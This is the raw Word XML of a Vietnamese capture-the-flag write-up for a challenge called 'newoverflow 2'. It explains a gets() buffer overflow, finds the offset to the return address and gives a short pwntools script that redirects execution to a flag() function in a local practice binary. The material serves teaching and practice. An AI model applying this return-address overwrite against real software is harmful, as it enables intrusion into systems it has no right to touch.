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D6" w:rsidRDefault="00457B35">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00457B35">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
        <w:t>N</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
        <w:t>EWOVERFLOW</w:t>
      </w:r>
      <w:r w:rsidRPr="00457B35">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
        <w:t xml:space="preserve"> SOLUTION</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00457B35" w:rsidRDefault="00457B35">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00457B35" w:rsidRDefault="00457B35" w:rsidP="00457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hiểu source code:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsid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C2713" wp14:editId="1CE56A52">
            <wp:extent cx="594360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B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EE8BE0" wp14:editId="4A364026">
            <wp:extent cx="5943600" cy="669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hàm main, ta thấy chương trình gọi hàm vuln( ). Hàm vuln() nhập cho nhập vào buf. Rồi, thế là hết. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00457B35" w:rsidRDefault="008F5F12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đích của ta là lấy flag,</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidR="00457B35">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> ta thấy có 2 hàm có thể </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>lấy</w:t>
      </w:r>
      <w:r w:rsidR="00457B35">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> được flag: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B35">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> flag( )  và win_fn( ) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsid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flag( ) :  chỉ in ra thẳng flag</w:t>
      </w:r>
    </w:p>
    <w:p w:rsid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Hàm win_fn( ) : phải kiểm tra win1 và win2 bằng true thì mới in ra flag. Mà để win1 true thì phải gọi hàm win_fn1, để win2 true thì phải gọi hàm win_fn2 sau khi win1 true và nhận 3 tham số:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00457B35" w:rsidRP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B35">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">arg_check1 == 0xBAADCAFE </w:t>
      </w:r>
    </w:p>
    <w:p w:rsid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B35">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">arg_check2 == 0xCAFEBABE </w:t>
      </w:r>
    </w:p>
    <w:p w:rsid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B35">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>arg_check3 == 0xABADBABE)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00457B35" w:rsidRDefault="00457B35" w:rsidP="00457B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rất phức tạp. Nên chúng ta lựa chọn gọi thẳng hàm flag. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF2DB4" w:rsidRPr="00DF2DB4" w:rsidRDefault="00457B35" w:rsidP="00DF2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lỗi và hướng khai thác: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00457B35" w:rsidRDefault="00457B35" w:rsidP="00DF2DB4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trong vuln( ) , hàm gets(buf) nhập vào buf mà không kiểm tra độ dài kí tự mà chúng ta nhập vào. Điều đó gây ra lỗi buffer overflow</w:t>
      </w:r>
      <w:r w:rsidR="00DF2DB4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF2DB4" w:rsidRDefault="00DF2DB4" w:rsidP="00DF2DB4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sẽ lợi dụng lỗi trên để làm tràn địa chỉ return của vuln thành địa chỉ hàm flag( ) . Như vậy khi nhập xong buf, ra khỏi vuln( )  thì thay vì quay về main, chương trình sẽ đi đến hàm flag( ) và in ra flag( )  cho chúng ta. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF2DB4" w:rsidRDefault="00DF2DB4" w:rsidP="00DF2DB4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file binary xem có gì ngăn cản hướng exploit của chúng ta không ?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF2DB4" w:rsidRDefault="00DF2DB4" w:rsidP="00DF2DB4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DF2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E164F" wp14:editId="47DE7499">
            <wp:extent cx="3248478" cy="13908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B4" w:rsidRDefault="00DF2DB4" w:rsidP="00DF2DB4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DF2DB4" w:rsidRDefault="00DF2DB4" w:rsidP="00DF2DB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đây chúng ta không bị chặn canary và cũng no pie. Cho nên rất thoải mái để khai thác. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF2DB4" w:rsidRDefault="00DF2DB4" w:rsidP="00DF2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code khai thác:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF2DB4" w:rsidRDefault="00DF2DB4" w:rsidP="00DF2D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Để làm tràn sang địa chỉ return của vuln thì ta cần biết được offset từ buf cho đến địa chỉ return của vuln. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF2DB4" w:rsidRDefault="00DF2DB4" w:rsidP="00DF2D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F2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CC508" wp14:editId="19C07DA7">
            <wp:extent cx="5943600" cy="2201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B4" w:rsidRDefault="00DF2DB4" w:rsidP="00DF2D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Mình nhập vào dòng chữ “minh ten tuan” . sau đó show stack ra, thì có thể thấy offset từ buf ( chuỗi mình nhập) đến rbp+</w:t>
      </w:r>
      <w:r w:rsidR="008F5F12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là: 0x48 bytes.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF2DB4" w:rsidRDefault="00DF2DB4" w:rsidP="00DF2D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theo, ta cần địa chỉ hàm flag( ) .</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF2DB4" w:rsidRDefault="00DF2DB4" w:rsidP="00DF2D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2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B2169F" wp14:editId="058ED50E">
            <wp:extent cx="4839375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B4" w:rsidRDefault="00DF2DB4" w:rsidP="00DF2D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vào ý tưởng trên thì payload của ta có dạng:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF2DB4" w:rsidRDefault="00DF2DB4" w:rsidP="00DF2D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Payload = [64 bytes] + [địa chỉ flag-ghi đè lên địa chỉ rbp+</w:t>
      </w:r>
      <w:r w:rsidR="008F5F1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8F5F12" w:rsidRDefault="008F5F12" w:rsidP="00DF2D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from pwn import *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s = process('./</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>vuln</w:t>
      </w:r>
      <w:r w:rsidRPr="008F5F12">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>')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raw_input('debug')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flag = 0x40084d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ret = 0x000000000040028d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payload = 'a'*0x48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payload += p64(ret)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payload += p64(flag)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008F5F12" w:rsidRPr="008F5F12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s.sendline(payload)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008F5F12" w:rsidRPr="00DF2DB4" w:rsidRDefault="008F5F12" w:rsidP="008F5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sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>s.interactive()</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="008F5F12" w:rsidRPr="00DF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2E2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8D7402EA"/>
    <w:lvl w:ilvl="0" w:tplc="04FEBC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922EBC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C930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7A"/>
    <w:rsid w:val="00215DD6"/>
    <w:rsid w:val="003D747A"/>
    <w:rsid w:val="00457B35"/>
    <w:rsid w:val="008F5F12"/>
    <w:rsid w:val="00D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4A49"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{71136AFB-CED3-4C86-B88E-7837577E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2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-10-15T23:08:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-10-15T23:33:00Z</dcterms:modified>
</cp:coreProperties>
</file>